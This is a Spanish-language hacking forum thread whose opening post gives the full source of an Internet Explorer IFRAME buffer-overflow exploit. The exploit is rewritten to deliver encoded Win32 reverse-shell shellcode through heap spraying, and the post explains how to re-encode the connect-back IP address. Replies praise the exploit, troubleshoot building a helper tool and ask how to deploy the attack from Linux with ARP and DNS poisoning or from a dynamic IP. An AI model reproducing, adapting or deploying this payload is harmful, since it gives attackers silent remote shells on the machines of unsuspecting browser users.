Páginas: [1] 
|
 |
|
 Autor
|
Tema: Exploit IFRAME modificado para Reverse Shell por LoReDo & Gospel (Leído 3360 veces)
|
Gospel
Colaborador
 Desconectado
Mensajes: 1.576
monokuroumu
|
Microsoft Internet Explorer IFRAME Tag Overflow Exploit modificado para Reverse Shell por LoReDo & Gospel http://ns2.elhacker.net/rojodos/descargas/uploads/Internet.Exploiter.IFRAME.con.Reverse.Shell.by.LoReDo&Gospel.rar <HTML><!--
________________________________________________________________________________
,sSSSs, Ss, Internet Exploiter v0.1
SS" `YS' '*Ss. MSIE <IFRAME src=... name="..."> BoF PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS skylined@edup.tudelft.nl
Modificado para Reverse Shell por LoReDo & Gospel.
________________________________________________________________________________
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
-->
<SCRIPT language="javascript">
// Win32 MSIE exploit helper script, creates a lot of nopslides to land in
// and/or use as return address. Thanks to blazde for feedback and idears.
// Win32 reverse shell, por LoReDo & Gospel. Extraida del exploit GDI+
// Connnect back IP: 10.10.0.69 -> \x98\x98\x92\xD7 (XOReada con 0x92 en Hex)
// \x98\x98\x92\xD7 codificado en UTF-16 -> %u98**%u9298%u**D7
// @ Puerto 8721
shellcode = unescape("%u4343%u4343%uE1D9%u34D9%u5824%u5858%u8058%uE7E8%uC931%u8166%uACE9%u80FE%u9230%uE240%u7AFA%u92A2%u9292%uDFD1%u92D6%uEB75%uEB54%u6B7E%uF238%u9B4B%u3F67%u7F59%uA96E%uDC1C%u7E9C%u4AEC%uE170%u4B3F%u5C97%u6CE0%u8421%uC1C5%uCDA0%uA0A1%uD6BC%uDEDE%u9392%uC6C9%u771B%uCF1B%uF892%uCBA2%u19F6%u1993%u9ED2%uE219%u3F8E%uCA19%u799A%u1F9E%uB6C5%uC0C3%u426D%u511B%u79CB%uF882%uCC9A%u7C93%u9AF8%u19CB%u92EF%u6B12%uE696%uC376%u6DC1%u1DA6%u1A7A%u9292%uCB92%u961B%u701C%uA379%uF46D%u7E13%u9302%uFAC6%u9393%u9292%uC76D%uC58A%uC5C5%uD5C5%uD5C5%u6DC5%u86C7%u511B%u6DA3%u98FA%u9298%uFAD7%u9290%u83B0%u731B%u82F8%uC1C3%uC76D%u1782%uE752%u1FDB%uB6AE%u52A3%u87F8%u61CB%u5439%uB6D6%uD682%u55F4%uB6D6%u93AE%u1B93%uB6CE%u1BDA%uB6CE%u1BDE%uB6CE%u1FC2%uB6D6%uC682%uC3C2%uC3C3%uC3D3%uC3DB%u6DC3%u92E7%u6DC3%uBAC7%u731B%u9C79%u6DFA%u6D6D%u6D6D%u6DA3%uB6C7%u6DC5%u9EC7%uC76D%uC1B2%uC4C7%u19C5%uB6FE%u198A%uAED7%uC619%uEA97%u7893%uD819%u198A%uB2C8%u7993%uA071%u19DB%u19A6%u7C93%u6DA3%uA36E%u3E52%u72AA%u95E6%u5D53%u939F%u7955%uA960%uB6EE%uE786%u1973%uB6C8%u7993%u19F4%uD99E%uC819%u938E%u1979%u1996%u7A93%u9079%u52A3%u781B%uCCCD%uC9CF%u9A50%u6592%u446D%u4F58%u0052");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
<!--
The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
We land inside one of the nopslides and slide on down to the shellcode.
-->
<IFRAME SRC = file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME = "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC">
</IFRAME>
</HTML> Funciona silenciosamente a la perfección... Instrucciones para modificar la dirección connectback IP de la Shellcode Reverse Shell: // Win32 reverse shell, por LoReDo & Gospel. Extraida del exploit GDI+
// Connnect back IP: 10.10.0.69 -> \x98\x98\x92\xD7 (XOReada con 0x92 en Hex)
// \x98\x98\x92\xD7 codificado en UTF-16 -> %u98**%u9298%u**D7
// @ Puerto 8721 Enjoy!
|
|
|
|
|
En línea
|
|
|
|
LOKORIP
Desconectado
Mensajes: 60
|
estuve probando el exploit en mi propio sistema mi internet explorer es vulnerable y no me funciono el exploit
|
|
|
|
|
En línea
|
|
|
|
Rojodos
"If you wanna be free, you must be different"
Desconectado
Mensajes: 3.525
|
Solo se puede decir una cosa, a los dos: CHAPÓ!  |
|
|
|
|
En línea
|
|
|
|
|
|
LOKORIP
Desconectado
Mensajes: 60
|
gospel el programa que hiciste en c para codificar la shellcode de hexadecimal a utf-16 no me compila me marca dos errores lo estoy compilando en visual c++ el otro programa que hiciste para ejecutar la shellcode del exploit original del iframe ese me compilo sin problemas y ejecute la shellcode y dejo un puerto a la escucha el 28876 los dos errores que aparecen a la hora de compilar son estos
LIBCD.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
Debug/convertir.exe : fatal error LNK1120: 1 unresolved externals
QUE PODRA SER ??? MUCHAS GRACIAS DE ANTEMANO QUE BUEN MANUAL SE AVENTARON
|
|
|
|
|
En línea
|
|
|
|
|
ghosting
|
hola, una consulta, en el caso que usara linux, como puedo explotar este exploits? como hago para envenenar arp y dns, y que me devuelva la shell de win, o solo esta para win. ???  |
|
|
|
|
En línea
|
|
|
|
4D1cTo
Desconectado
Mensajes: 169
|
estoy probando el exploit este , y tengo q modificar el back ip , pero supongamos q tengo ip dinamica, entonces bien... me hago un dominio .no-ip.info , pero al tener q codearlo no se puede verdad ? entonces q hago ???
|
|
|
|
|
En línea
|
[ Linux Registered User #348950 ]
|
|
|
|
Páginas: [1] 
|
|
|
 |
